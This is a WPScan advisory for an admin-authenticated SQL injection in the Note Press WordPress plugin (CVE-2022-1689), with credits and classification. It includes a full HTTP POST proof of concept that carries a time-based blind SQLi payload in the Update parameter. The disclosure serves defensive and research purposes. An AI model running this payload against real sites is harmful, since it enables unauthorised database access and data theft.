WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Note Press <= 0.1.10 - Admin+ SQLi via Update

Description

The plugin does not sanitise and escape the Update parameter before using it in a SQL statement when updating a note via the admin dashboard, leading to an SQL injection

Proof of Concept

POST /wp-admin/admin.php?page=Note_Press-Main-Menu&action=edit&id=17 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?page=Note_Press-Main-Menu&action=edit&id=17
Content-Type: application/x-www-form-urlencoded
Content-Length: 186
Origin: http://localhost
DNT: 1
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

_wpnonce=f5b4b02f56&Title=Test&stickycolor=&Deadline=&Priority=0&iconselect%5B%5D=aablank.png&display_name=admin&Note_Presseditor=&Update=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)

Affects Plugins

note-press
No known fix - plugin closed

References

CVE
CVE-2022-1689
URL
https://bulletin.iese.de/post/note-press_0-1-10_2

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Daniel Krohmer (Fraunhofer IESE, Germany), Shi Chen (University of Kaiserslautern, Germany)

Submitter

Daniel Krohmer

Submitter website
https://iese.fraunhofer.de/en.html
Verified

Yes

WPVDB ID
982f84a1-216d-41ed-87bd-433b695cec28

Timeline

Publicly Published

2022-05-09 (about 1 years ago)

Added

2022-05-12 (about 1 years ago)

Last Updated

2022-05-14 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin